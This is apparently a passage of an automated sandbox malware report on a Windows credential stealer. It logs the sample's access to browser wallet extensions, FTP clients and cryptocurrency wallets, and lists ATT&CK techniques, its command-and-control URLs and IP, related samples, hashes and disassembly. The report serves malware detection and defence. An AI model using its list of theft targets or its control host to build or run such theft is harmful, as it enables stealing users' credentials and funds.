            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
            Source: Yara matchFile source: 00000005.00000003.1409970850.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Process Injection
            35
            Virtualization/Sandbox Evasion
            2
            OS Credential Dumping
            751
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Process Injection
            LSASS Memory35
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol41
            Data from Local System
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
            Obfuscated Files or Information
            Security Account Manager2
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared Drive113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
            Software Packing
            NTDS1
            File and Directory Discovery
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets223
            System Information Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            file.exe100%AviraTR/Crypt.TPM.Gen
            file.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://property-imper.sbs/api=c0%Avira URL Cloudsafe
            https://property-imper.sbs/api4c0%Avira URL Cloudsafe
            https://property-imper.sbs/60%Avira URL Cloudsafe
            https://property-imper.sbs/apie0%Avira URL Cloudsafe
            https://property-imper.sbs:443/apiL0%Avira URL Cloudsafe
            https://property-imper.sbs/apiU0%Avira URL Cloudsafe
            https://property-imper.sbs/apisbs00%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            property-imper.sbs
            104.21.33.116
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://property-imper.sbs/apifalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabfile.exe, 00000005.00000003.1330872579.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330607643.000000000564D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330737451.000000000564A000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://duckduckgo.com/ac/?q=file.exe, 00000005.00000003.1330872579.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330607643.000000000564D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330737451.000000000564A000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://property-imper.sbs/apiefile.exe, 00000005.00000002.1522481301.0000000000C4B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://property-imper.sbs:443/apifile.exe, 00000005.00000003.1380323246.0000000005690000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1380186415.000000000568C000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000005.00000003.1330872579.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330607643.000000000564D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330737451.000000000564A000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://property-imper.sbs/api=cfile.exe, 00000005.00000003.1518956356.0000000000CBB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1518592008.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1454188525.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000002.1522911134.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1520960231.0000000000CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000005.00000003.1330872579.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330607643.000000000564D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330737451.000000000564A000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000005.00000003.1380636626.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://property-imper.sbs/6file.exe, 00000005.00000002.1522481301.0000000000C77000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000005.00000003.1330872579.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330607643.000000000564D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330737451.000000000564A000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://property-imper.sbs/apiUfile.exe, 00000005.00000002.1522481301.0000000000C4B000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://ocsp.rootca1.amazontrust.com0:file.exe, 00000005.00000003.1380636626.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://www.ecosia.org/newtab/file.exe, 00000005.00000003.1330872579.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330607643.000000000564D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330737451.000000000564A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://property-imper.sbs/api4cfile.exe, 00000005.00000002.1522911134.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1520960231.0000000000CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://property-imper.sbs/file.exe, 00000005.00000002.1522481301.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1518592008.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1521017261.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1518956356.0000000000CBB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1518592008.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1430570336.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1430618094.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000002.1522911134.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1454346053.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1410030452.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1409970850.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1519174505.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1520960231.0000000000CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000005.00000003.1381910650.0000000005932000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpgfile.exe, 00000005.00000003.1382248273.0000000005611000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://ac.ecosia.org/autocomplete?q=file.exe, 00000005.00000003.1330872579.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330607643.000000000564D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330737451.000000000564A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700file.exe, 00000005.00000003.1382248273.0000000005611000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://property-imper.sbs/apisbs0file.exe, 00000005.00000002.1522481301.0000000000C4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://x1.c.lencr.org/0file.exe, 00000005.00000003.1380636626.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://x1.i.lencr.org/0file.exe, 00000005.00000003.1380636626.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000005.00000003.1382248273.0000000005611000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://property-imper.sbs:443/apiLfile.exe, 00000005.00000003.1379663950.000000000568C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000005.00000003.1330872579.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330607643.000000000564D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330737451.000000000564A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000005.00000003.1380636626.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000005.00000003.1381910650.0000000005932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000005.00000003.1330872579.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330607643.000000000564D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330737451.000000000564A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          104.21.33.116
                                                          property-imper.sbsUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1561593
                                                          Start date and time:2024-11-23 21:07:10 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 5m 17s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:12
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:file.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:Failed
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: file.exe
                                                          TimeTypeDescription
                                                          15:08:06API Interceptor8x Sleep call for process: file.exe modified
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          104.21.33.116file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                  Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                    S#U043eftWare.exeGet hashmaliciousLummaC StealerBrowse
                                                                      Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                        Aura.exeGet hashmaliciousUnknownBrowse
                                                                          injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              property-imper.sbsfile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                              • 104.21.33.116
                                                                              Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.21.33.116
                                                                              S#U043eftWare.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.21.33.116
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUS18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                                              • 172.66.0.158
                                                                              kwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                              • 104.20.22.46
                                                                              https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzubGet hashmaliciousUnknownBrowse
                                                                              • 104.17.25.14
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                              • 172.64.41.3
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.21.33.116
                                                                              cmd.exeGet hashmaliciousBlank GrabberBrowse
                                                                              • 162.159.128.233
                                                                              http://elizgallery.com/js.phpGet hashmaliciousUnknownBrowse
                                                                              • 172.64.41.3
                                                                              https://elizgallery.com/nazvanie.jsGet hashmaliciousUnknownBrowse
                                                                              • 104.22.0.204
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                              • 104.21.33.116
                                                                              Aquantia_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.21.33.116
                                                                              Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.21.33.116
                                                                              No context
                                                                              No created / dropped files found
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.94830159733451
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:file.exe
                                                                              File size:1'866'752 bytes
                                                                              MD5:5e73b0576450ed5ffd50f136a205a42e
                                                                              SHA1:44d41e87ac4a7606006f77c5c49791e1389292b9
                                                                              SHA256:e83261e251f282c7c4f68bb8ba9ab58577cba92e863c1cfd488d6ce6de7192ef
                                                                              SHA512:5da2a5015b932b76d03f8d3bec630738c0b98602c73fe4af71d7839956017aeb32ed108679d264c4fcdc15fa857fde59b2b7b9479d19985045d154b49b9a9cbd
                                                                              SSDEEP:49152:FYt+h5gxqV+CoTxbceIcqFvwFrDO4FuXXIi:4+0xqVdoTOpBvwFrDORIi
                                                                              TLSH:658533E2C4C4EEE4D11CA2B5E1C2EA2C9A793141CCE66067BE1F753E35E69876339C40
                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g.............................0J...........@..........................`J.....'.....@.................................\...p..
                                                                              Icon Hash:90cececece8e8eb0
                                                                              Entrypoint:0x8a3000
                                                                              Entrypoint Section:.taggant
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:6
                                                                              OS Version Minor:0
                                                                              File Version Major:6
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:6
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                              Instruction
                                                                              jmp 00007F466543EB4Ah
                                                                              cvtps2pd xmm3, qword ptr [eax+eax]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              jmp 00007F4665440B45h
                                                                              add byte ptr [esi], al
                                                                              or al, byte ptr [eax]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], dh
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], cl
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [edx], ah
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax+eax*4], cl
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              adc byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              push es
                                                                              or al, byte ptr [eax]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], dh
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add bh, bh
                                                                              inc dword ptr [eax]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [ecx], cl
                                                                              add byte ptr [eax], 00000000h
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              adc byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              push es
                                                                              or al, byte ptr [eax]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], dh
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax+00h], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              or byte ptr [eax+00000000h], al
                                                                              add byte ptr [eax], al
                                                                              adc byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              push es
                                                                              or al, byte ptr [eax]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], dh
                                                                              add byte ptr [eax], al
